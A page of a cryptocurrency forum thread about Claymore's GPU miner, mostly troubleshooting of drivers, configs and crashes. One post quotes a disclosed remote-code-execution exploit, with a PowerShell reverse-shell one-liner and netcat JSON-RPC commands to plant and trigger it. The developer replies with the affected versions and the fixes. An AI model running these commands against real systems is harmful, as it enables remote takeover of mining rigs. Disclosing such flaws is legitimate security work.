Bitcoin Forum
August 15, 2018, 07:42:47 PM *
News: Latest stable version of Bitcoin Core: 0.16.2  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: « 1 ... 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 [1197] 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 »
  Print  
Author Topic: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v11.9 (Windows/Linux)  (Read 6223059 times)
iSuX
Jr. Member
*
Offline Offline

Activity: 42
Merit: 8


View Profile
May 17, 2018, 07:24:21 AM
 #23921

Is it possible now or in a future version to move dcri and dcoin settings to dpools.txt?

Interesting question, why would you want to do that?
Pools relates to, (references), the pool and fallback pools you're mining with.

dcri relates to the hardware, tuning etc, (no relation to pool, at least not that I can see).

What situation are you trying to solve here?

Note: You can very easily have multiple batch files, containing a full config set, or use the config.txt for hardware setup, (dcri etc), and use a simplified batchfile to start, (referencing config.txt and pool.txt files).

Claymore is pretty nicely architectured in that sense, multiple configuration methods, depending on your use case or preference.

Also, a note on "moving", changing architecture in such a drastic way, is generally a very bad idea, unless there is a specific showstopper bug, (not likely in a more mature package). But essentially if you do that, you have a branch, and create a legacy of shit for users.
The mature users will know the old way, and the new users will probably only know the new way.

The reality of this is, endless questions about why "it" does not work from the very same people who never read the readme.

This is still an interesting question though, can you please add some background as to why you'd want dcri in the pools.txt file?

Happy mining.



KISS. Did you read the Readme.txt?
Summarise/Itemise your hardware/versions/expectations/batchfile & results. The more specific, detailed, the better
1534362167
Hero Member
*
Offline Offline

Posts: 1534362167

View Profile Personal Message (Offline)

Ignore
1534362167
Reply with quote  #2

1534362167
Report to moderator
1534362167
Hero Member
*
Offline Offline

Posts: 1534362167

View Profile Personal Message (Offline)

Ignore
1534362167
Reply with quote  #2

1534362167
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1534362167
Hero Member
*
Offline Offline

Posts: 1534362167

View Profile Personal Message (Offline)

Ignore
1534362167
Reply with quote  #2

1534362167
Report to moderator
FarmFrenzy
Jr. Member
*
Offline Offline

Activity: 224
Merit: 5


View Profile WWW
May 17, 2018, 09:56:11 AM
 #23922

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?

GigTricks
WORLD FIRST INTEGRATED FREELANCE & ON-DEMAND ECOSYSTEMS
WHITEPAPER | BOUNTY | ANN THREAD
www.gigtricks.io
AzzAz
Hero Member
*****
Offline Offline

Activity: 903
Merit: 1000


View Profile
May 17, 2018, 11:28:54 AM
 #23923

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.
LJLT
Jr. Member
*
Offline Offline

Activity: 32
Merit: 0


View Profile
May 17, 2018, 02:03:22 PM
 #23924

Anyone has anyidea whats happening with ethermine.org? or is it Claymore or what? is it my connection?

I got Failovers but the hashrate is the same as always

https://imgur.com/a/I9uo2x0
kirilvvbg
Full Member
***
Offline Offline

Activity: 213
Merit: 100


View Profile
May 17, 2018, 02:09:27 PM
 #23925

Hi Claymore,

Can you add new event in EthereumManager - about rejected shares.
Not sure if it could be managed by user - to target specific ratio accepted/rejected, to put some limit, etc.
Or at least to be preset by you - rejected shares as % of the accepted.

The point is to get notification that a GPU is not working properly for some reason (pool, clock, whatever).
So that a proper action could be taken.

I hope you understand my desire.
In case that this is already possible in the remote manager - sorry for bothering. But please point how to do it.

Thanks
KVV
cabri
Newbie
*
Offline Offline

Activity: 11
Merit: 0


View Profile
May 17, 2018, 02:17:17 PM
 #23926

For 3GB Mining on Win10, use 376.33 Version of Nvidia Driver. Now, It is working without -eres command.
FarmFrenzy
Jr. Member
*
Offline Offline

Activity: 224
Merit: 5


View Profile WWW
May 17, 2018, 06:32:10 PM
 #23927

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.

Thank you for the answer. But I read many messages before - people wrote here that they use the newest Windows version with blockchain drivers and it works fine.
What driver do you suggest to use in this case?

GigTricks
WORLD FIRST INTEGRATED FREELANCE & ON-DEMAND ECOSYSTEMS
WHITEPAPER | BOUNTY | ANN THREAD
www.gigtricks.io
blockaudit
Jr. Member
*
Offline Offline

Activity: 34
Merit: 2

Helping the blockchain world build secure++ stuff!


View Profile WWW
May 17, 2018, 06:40:10 PM
 #23928

FYI a remote exploit for v7.3+ was made public:

https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/

Quote
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
 
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
Convert it into hexadecimal and paste it on the second parameter inside this string:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
 
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
 
You got the shell!
 
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.

It's unclear if this issue has been fixed or not, feel free to provide more information on what versions if was fixed on if so.

Quote
Before continuing to read I want to clarify that I already emailed nanopool without receiving any kind or response, so I’m publicly disclosure this vulnerability waiting for a CVE assignment.

https://www.blockaudit.org
Raja_MBZ
Hero Member
*****
Online Online

Activity: 938
Merit: 582



View Profile WWW
May 17, 2018, 09:57:46 PM
 #23929

Anyone has anyidea whats happening with ethermine.org? or is it Claymore or what? is it my connection?

I got Failovers but the hashrate is the same as always

https://imgur.com/a/I9uo2x0

Well I'm using ethermine.org along with Claymore miner as well and not having any issue similar to that. However, I do remember that it happened a few months back when I had under-volted too much using Claymore miner's integrated under-volting feature. Once I raised the voltage (mV) back a bit, it started to work fine.

Are you using any sort of over-clocking or under-volting options of the miner?

.FORTUNE.JACK.
      ▄▄███████▄▄
   ▄████▀▀ ▄ ██████▄
  ████ ▄▄███ ████████
 █████▌▐███▌ ▀▄ ▀█████
███████▄██▀▀▀▀▄████████
█████▀▄▄▄▄█████████████
████▄▄▄▄ █████████████
 ██████▌ ███▀████████
  ███████▄▀▄████████
   ▀█████▀▀███████▀
      ▀▀██████▀▀
         
         █
...FortuneJack.com                                             
...THE BIGGEST BITCOIN GAMBLING SITE
       ▄▄█████████▄▄
    ▄█████████████████▄
  ▄█████████████████████▄
 ▄██
█████████▀███████████▄
██████████▀   ▀██████████
█████████▀       ▀█████████
████████           ████████
████████▄   ▄ ▄   ▄████████
██████████▀   ▀██████████
 ▀██
█████████████████████▀
  ▀██
███████████████████▀
    ▀█████████████████▀
       ▀▀█████████▀▀
#JACKMATE
WIN 1 BTC
▄█████████████████████████▄
███████████████████████████
███████████████████████████
██████████▀█████▀██████████
███████▀░░▀░░░░░▀░░▀███████
██████▌░░░░░░░░░░░░░▐██████
██████░░░░██░░░██░░░░██████
█████▌░░░░▀▀░░░▀▀░░░░▐█████
██████▄░░▄▄▄░░░▄▄▄░░▄██████
████████▄▄███████▄▄████████

███████████████████████████
███████████████████████████
▀█████████████████████████▀
Claymore
Donator
Legendary
*
Offline Offline

Activity: 1330
Merit: 1213

Miners developer


View Profile
May 17, 2018, 10:51:25 PM
 #23930


More precisely, it works until v8.1, in v8.1 "-mport" is working in read-only mode by default, check "History.txt" file for details. Another thing required for this "exploit" is direct access to internet for the system, it will not work via NAT or firewall without your permission.
Later versions had another issue that was fixed too, see my message:
https://bitcointalk.org/index.php?topic=1433925.msg28540417#msg28540417

Please read Readme and FAQ in the first post of this thread before asking any questions, probably the answer is already there.
List of my miners: https://bitcointalk.org/index.php?topic=3019607
AzzAz
Hero Member
*****
Offline Offline

Activity: 903
Merit: 1000


View Profile
May 18, 2018, 12:45:16 AM
 #23931

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.

Thank you for the answer. But I read many messages before - people wrote here that they use the newest Windows version with blockchain drivers and it works fine.
What driver do you suggest to use in this case?

18.x.x   like 18.3.4. Sometimes it works with 1803, even 18.4.x sometimes do, but most secure 18.3.4 with 1803 uninstalled (best from fresh win10 installation-updated )
pepi04
Newbie
*
Offline Offline

Activity: 5
Merit: 0


View Profile
May 18, 2018, 08:30:52 AM
 #23932

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?
leonix007
Sr. Member
****
Offline Offline

Activity: 644
Merit: 276


Grow with community


View Profile
May 18, 2018, 10:16:16 AM
 #23933

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?

try these drivers that were already suggestion earlier

For 3GB Mining on Win10, use 376.33 Version of Nvidia Driver. Now, It is working without -eres command.


       █
      ██
     ██
   ██ ██
 █ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
   
       █
      ██
     ██
   ██ ██
 █ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
██ ██ ██
  B

          ▄▄▄▄▄▄
     ▄▄████████████▄▄
   ▄█████▀▀    ▀▀█████▄
  ████▀            ▀████
 ████                ████
▐███                  ███▌
███▌                  ▐███
▐███           ▄▄     ███▌
 ████         ▀███▄  ▐███
  ████▄         ▀███▄███
   ▀█████▄▄     ▄█████▀
     ▀▀████████████▀▀
          ▀▀▀▀▀▀
T 
Better. Quick.

Transparent.






             ▄████▄▄   ▄
█▄          ██████████▀▄
███        ███████████▀
▐████▄     ██████████▌
▄▄██████▄▄▄▄█████████▌
▀████████████████████
  ▀█████████████████
  ▄▄███████████████
   ▀█████████████▀
    ▄▄█████████▀
▀▀██████████▀
    ▀▀▀▀▀






▄█████████████████████████▄
███████████████████████████
███████████████▀       ████
██████████████      ▄▄▄████
██████████████    ▐████████
██████████████    ▐████████
██████████            ▐████
██████████            █████
██████████████    ▐████████
██████████████    ▐████████
██████████████    ▐████████
▀█████████████    ▐███████▀






                   ▄▄████
              ▄▄████████▌
         ▄▄█████████▀███
    ▄▄██████████▀▀ ▄███▌
▄████████████▀▀  ▄█████
▀▀▀███████▀   ▄███████▌
      ██    ▄█████████
       █  ▄██████████▌
       █  ███████████
       █ ██▀ ▀██████▌
       ██▀     ▀████
                 ▀█▌
Call_Me_Bambi
Sr. Member
****
Offline Offline

Activity: 448
Merit: 257


The Future of Digital Collectibles


View Profile
May 18, 2018, 10:33:04 AM
 #23934

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?

It could be the "AMD Radeon R7 integrated" that's causing the problem (not enough memory). Try removing it from the mining config using the "-di" option; see OP for a detailed description on this.

Examples:

Code:
EthDcrMiner64.exe -epool us1.ethpool.org:3333 -ewal 0xD...E6F -epsw x -di 0
or
 EthDcrMiner64.exe -epool us1.ethpool.org:3333 -ewal 0xD...E6F -epsw x -di 1

EPIK



              ▄▄███████▄▄
        ▄███████████████▄
    ▄█████████    ████████▄
  ▄█████▀▀              ▀▀█████▄
▄█████      ▄██    ██▄███████▄
███████      ▀▀    ▀▀█████████
████████    ▄▄    ▄▄█████████
██████▀    ███    ██▀████████
  █████▄      ▀▀    ▀▀  ▀██████
  ▀███████▄▄▄    ▄▄███████▀
      ▀████████▄▄███████▀
          ▀█████████████▀
                  ▀▀▀▀▀▀▀
TOKEN

THE FUTURE OF DIGITAL COLLECTIBLES
███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
Ann Thread
  Telegram  Twitter  Facebook  Medium  Reddit  Whitepaper 



▄█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▄
█    ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀  █
████████████████████
████████████████████
███████████████▀▀▀▀▀
██████████████  ▄▀███
██████████████▄  ▀▀▀▀
████████████████████
▀██████████████████▀
WALLET

          

██████████  █████████
██████████  █████████
██████████  █████████
  ▄▄▄▄▄▄▄▄▄▀▄▄▄▄▄▄▄▄
  █████████  ████████
  █████████  ████████
  █████████  ████████
  █████████  ████████
  █████████  ████████
ITEMS
androstan1234
Jr. Member
*
Offline Offline

Activity: 219
Merit: 5


View Profile
May 18, 2018, 11:48:33 AM
 #23935

fyi updated to 1803 and zero issues using 18.2.1 driver.  Mixed amd/nvidia rigs.
Krishi
Newbie
*
Offline Offline

Activity: 5
Merit: 0


View Profile
May 18, 2018, 12:42:43 PM
 #23936

Finally managed to get 11.7 running in ubuntu, had an issue where the miner couldn't find libcurl.so.4.
Only thing now is, for some reason the miner started mining devfee. Of course I don't mind except that I'm using a 1060 3gb and devfee is not supposed to mine on them anymore right?

What did you do to get it running?  Hopefully you found a workaround that allows you to have both libcurl4 and libcurl3 installed.



Well I'm very new to ubuntu, but I'm moving to it permanently now.
Honestly I'm not sure what I did to get it working eventually, a heck of a lot googling and installing packages.
BryanMeLee
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
May 18, 2018, 02:47:31 PM
 #23937

Finally managed to get 11.7 running in ubuntu, had an issue where the miner couldn't find libcurl.so.4.
Only thing now is, for some reason the miner started mining devfee. Of course I don't mind except that I'm using a 1060 3gb and devfee is not supposed to mine on them anymore right?

What did you do to get it running?  Hopefully you found a workaround that allows you to have both libcurl4 and libcurl3 installed.



Well I'm very new to ubuntu, but I'm moving to it permanently now.
Honestly I'm not sure what I did to get it working eventually, a heck of a lot googling and installing packages.

from a shell:

dpkg -l libcurl4
dpkg -l libcurl3

The one that is installed will list the version.  The one that is not will simply say "<none>" for version.
blockaudit
Jr. Member
*
Offline Offline

Activity: 34
Merit: 2

Helping the blockchain world build secure++ stuff!


View Profile WWW
May 18, 2018, 06:35:12 PM
 #23938


More precisely, it works until v8.1, in v8.1 "-mport" is working in read-only mode by default, check "History.txt" file for details. Another thing required for this "exploit" is direct access to internet for the system, it will not work via NAT or firewall without your permission.
Later versions had another issue that was fixed too, see my message:
https://bitcointalk.org/index.php?topic=1433925.msg28540417#msg28540417

Thanks for the data, good to know!

Have you all had any official security code reviews or application pen-tests in order to have more confidence that these types of trivial issues won't be found again?

https://www.blockaudit.org
lenhanhvu
Newbie
*
Offline Offline

Activity: 9
Merit: 0

wellcom


View Profile
May 18, 2018, 06:37:42 PM
 #23939

The price attracts the talk 
Nanashii
Newbie
*
Offline Offline

Activity: 5
Merit: 0


View Profile
May 18, 2018, 11:13:08 PM
 #23940

Does anyone have any idea what could be causing this error? I've been dual mining XVG and ETH since 11.0 came out with 6 1070Ti's at +100/+650 OC. The rig ran for weeks at a time without any issues. A week ago I updated Windows to 1803 and the miner to 11.7, switched to mining ETH only and started getting this error after 70-80 hours of mining. Current OC settings are -200/+650. No rejected or incorrect shares. I've mined ETH only before at these OC settings and didn't have any issues.

Quote
GPU 0, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 0, GpuMiner kx failed 1
GPU 0 failed
GPU 0, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 0, GpuMiner kx failed 1
GPU 3, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 1, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 3, GpuMiner kx failed 1
GPU 1, GpuMiner kx failed 1
GPU 0 failed
GPU 3 failed
GPU 3, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 1 failed
GPU 5, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 3, GpuMiner kx failed 1
GPU 2, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 4, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 1, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 5, GpuMiner kx failed 1
GPU 2, GpuMiner kx failed 1
GPU 4, GpuMiner kx failed 1
GPU 1, GpuMiner kx failed 1
GPU 5 failed
GPU 2 failed
GPU 1 failed
GPU 2, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 4 failed
GPU 4, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 3 failed
GPU 5, GpuMiner cu_k1 failed 77, an illegal memory access was encountered
GPU 2, GpuMiner kx failed 1
GPU 4, GpuMiner kx failed 1
GPU 5, GpuMiner kx failed 1
GPU 2 failed
GPU 4 failed
GPU 5 failed
ETH: 05/18/18-17:27:56 - New job from us1.ethermine.org:4444
ETH - Total Speed: 0.000 Mh/s, Total Shares: 12430, Rejected: 0, Time: 74:01
ETH: GPU0 0.000 Mh/s, GPU1 0.000 Mh/s, GPU2 0.000 Mh/s, GPU3 0.000 Mh/s, GPU4 0.000 Mh/s, GPU5 0.000 Mh/s
ETH: 05/18/18-17:28:09 - New job from us1.ethermine.org:4444
ETH - Total Speed: 0.000 Mh/s, Total Shares: 12430, Rejected: 0, Time: 74:01
ETH: GPU0 0.000 Mh/s, GPU1 0.000 Mh/s, GPU2 0.000 Mh/s, GPU3 0.000 Mh/s, GPU4 0.000 Mh/s, GPU5 0.000 Mh/s
WATCHDOG: GPU error, you need to restart miner Sad
Restarting OK, exit...
Pages: « 1 ... 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 [1197] 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!